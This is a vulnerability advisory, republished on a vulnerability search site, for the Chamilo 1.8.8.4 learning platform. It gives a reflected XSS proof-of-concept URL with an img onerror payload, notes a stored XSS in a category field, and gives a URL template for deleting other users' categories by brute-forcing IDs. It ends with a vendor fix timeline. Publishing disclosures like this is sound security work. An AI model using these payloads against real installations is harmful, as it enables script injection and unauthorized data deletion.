Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Chamilo 1.8.8.4 XSS / File Deletion

Related Vulnerabilities: CVE-2012-4029   CVE-2012-4030  
Publish Date: 27 Aug 2012
Author: beford
Source 
                							

                Chamilo 1.8.8.4 Multiple Vulnerabilities
========================

CVE: CVE-2012-4029
Issue: Reflected XSS PHP_SELF in third-party  app, Stored XSS

* PHP_SELF XSS
http://chamilo-1.8.8.4/main/inc/lib/phpdocx/pdf/www/examples.php/'"><img
src=404 onerror=alert(1) >

* Stored XSS unfiltered input category_name

http://chamilo/chamilo-1.8.8.4/main/dropbox/index.php?cidReq=LEETLANG&view=&action=addsentcategory


CVE: CVE-2012-4030
Issue: Unauthorized file delete

* Unauthorized file delete

You have to be subscribed to the course and you can delete other users
categories by bruteforcing the category ID.

http://chamilo/chamilo-1.8.8.4/main/dropbox/index.php?cidReq=COURSEID&view_received_category=&view_sent_category=&view=&action=deletesentcategory&id=CATEGORYID

Vendor:
  www.chamilo.org

Vendor informed:
  Jul 16/2012

Vendor acknowledgement:
  Jul 16/2012

Fix Released
  Version 1.8.8.6 - Jul 20/2012
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started